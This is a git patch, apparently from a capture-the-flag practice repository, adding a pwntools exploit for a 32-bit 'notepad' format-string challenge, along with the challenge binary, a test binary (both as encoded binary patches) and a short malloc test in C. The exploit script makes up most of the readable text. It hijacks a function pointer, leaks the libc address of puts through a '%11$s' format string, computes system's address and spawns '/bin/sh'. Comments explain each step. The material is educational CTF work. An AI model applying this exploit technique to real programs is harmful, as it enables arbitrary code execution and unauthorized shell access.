From 0deb3b5025a06966e049e9571def79b28f20f10a Mon Sep 17 00:00:00 2001
From: Jack Ren <bjrjk@qq.com>
Date: Sun, 19 Sep 2021 17:33:26 +0800
Subject: [PATCH] Finished format-string/notepad

---
 format-string/notepad/answer.py    | 111 +++++++++++++++++++++++++++++
 format-string/notepad/notepad      | Bin 0 -> 12524 bytes
 format-string/notepad/testMalloc   | Bin 0 -> 7220 bytes
 format-string/notepad/testMalloc.c |   9 +++
 4 files changed, 120 insertions(+)
 create mode 100755 format-string/notepad/answer.py
 create mode 100755 format-string/notepad/notepad
 create mode 100755 format-string/notepad/testMalloc
 create mode 100644 format-string/notepad/testMalloc.c

diff --git a/format-string/notepad/answer.py b/format-string/notepad/answer.py
new file mode 100755
index 0000000..6cd0d80
--- /dev/null
+++ b/format-string/notepad/answer.py
@@ -0,0 +1,111 @@
+#!/usr/bin/env python2
+from pwn import *
+from LibcSearcher import *
+from struct import pack
+import os, base64, math, time
+context(arch = "i386",os = "linux", log_level = "debug")
+
+def notepad_init(p):
+    p.recvuntil("::> ")
+    p.sendline("c")
+
+def notepad_new(p):
+    p.recvuntil("::> ")
+    p.sendline("a")
+    p.recvuntil("size > ")
+    p.sendline("16")
+    p.recvuntil("data > ")
+    p.sendline("\x00")
+
+def notepad_open(p, id, content, option):
+    p.recvuntil("::> ")
+    p.sendline("b")
+    p.recvuntil("id > ")
+    p.sendline("%d" % id)
+    p.recvuntil("edit (Y/n)")
+    p.sendline("Y")
+    p.recvuntil("content > ")
+    p.sendline(content)
+    p.recvuntil("::> ")
+    p.sendline(option)
+
+def notepad_open_noinput(p, id, option):
+    p.recvuntil("::> ")
+    p.sendline("b")
+    p.recvuntil("id > ")
+    p.sendline("%d" % id)
+    p.recvuntil("::> ")
+    p.sendline(option)
+
+
+p = process('./notepad')
+elf = ELF('./notepad')
+gdb_command =   """
+                b *0x8048ae7
+                b *0x8048ce8
+                """
+# 0x8048ae7: malloc on notepad_new
+# 0x8048ce8: call eax on notepad_open
+strncpy_plt = elf.plt['strncpy']
+"""
+    The PLT address of printf end with 0x00, obstructed the copy from 
+stack variable array s in notepad_open() to v1->text in heap on strncpy()
+function. According to PLT/GOT mechanism, call to PLT entry address + 6 
+will lead to dynamic linker refilling the GOT table entry and reinvoke
+function again. So add the origin PLT address to a offset 0x6 will have
+the same effect on calling the pure PLT entry.
+"""
+printf_plt = elf.plt['printf'] + 0x6
+puts_plt = elf.plt['puts']
+puts_got = elf.got['puts']
+time.sleep(1)
+# gdb.attach(p, gdb_command)
+
+
+notepad_init(p)
+"""
+    Via experimenting, every 0x20 Bytes memory block allocation request 
+sent to malloc() would lead to a 0x30 Bytes offset between two memory 
+block pointers.
+"""
+for i in range(4):
+    notepad_new(p) # Apply memory for 4 notepadStruct
+
+# Write strncpy() address to notepadStruct0.text(&notepadStruct0+16B)
+notepad_open(p, 0, p32(strncpy_plt), "a")
+"""
+    First, send the printf format string to stack variable array s. The 
+11th argument will be the GOT adress of puts. We need to leak that.
+    Secondly, there exists a vulnerability in menu() so we can call arbitary
+function, and the offset between &notepadStruct1 and &notepadStruct0.text
+is 0x20, so we minus 8 here in the option.
+    In all, we executed strncpy(&notepadStruct1, "%11$s", 16).
+"""
+notepad_open(p, 1, "%11$s    " + "\x00", chr(ord("a") - 8))
+# Write printf() address to notepadStruct0.text(&notepadStruct0+16B)
+notepad_open(p, 0, p32(printf_plt), "a")
+"""
+    Here we wrote GOT address of puts() to the stack also the 11th argument
+position and called the printf().
+    In all, we executed printf("%11$s", ... (9 arguments), got_of_puts) to
+leak the libc address of puts to find libc base offset.
+"""
+notepad_open(p, 1, p32(puts_got) + "    \x00", chr(ord("a") - 8))
+
+puts_libc = u32(p.recv(4))
+print("puts libc: %s" % hex(puts_libc))
+libc = LibcSearcher('puts', puts_libc)
+libc_base = puts_libc - libc.dump('puts')
+print("base libc: %s" % hex(libc_base))
+system_libc = libc_base + libc.dump('system')
+print("system libc: %s" % hex(system_libc))
+
+# Similarly, copy "/bin/sh" as the first argument
+notepad_open(p, 2, p32(strncpy_plt), "a")
+notepad_open(p, 3, "/bin/sh" + "\x00", chr(ord("a") - 8))
+# Prepare system()
+notepad_open(p, 2, p32(system_libc), "a")
+# Call system("/bin/sh")
+notepad_open_noinput(p, 3, chr(ord("a") - 8))
+
+p.interactive()
\ No newline at end of file
diff --git a/format-string/notepad/notepad b/format-string/notepad/notepad
new file mode 100755
index 0000000000000000000000000000000000000000..9f336cf8571e383ea48782b43d806596737bf92b
GIT binary patch
literal 12524
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
DJ0zMp

literal 0
HcmV?d00001

diff --git a/format-string/notepad/testMalloc b/format-string/notepad/testMalloc
new file mode 100755
index 0000000000000000000000000000000000000000..ba5b9626b02711f7c498dd243d465f3eb2daaf81
GIT binary patch
literal 7220
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
S-c#ImM{tO5+8X(z?EV7{@US%i

literal 0
HcmV?d00001

diff --git a/format-string/notepad/testMalloc.c b/format-string/notepad/testMalloc.c
new file mode 100644
index 0000000..0371e58
--- /dev/null
+++ b/format-string/notepad/testMalloc.c
@@ -0,0 +1,9 @@
+#include <stdio.h>
+#include <stdlib.h>
+int main(){
+	for(int i=0; i<10; i++){
+		void *p = malloc(0x20);
+		printf("%p\n", p);
+	}
+	return 0;
+}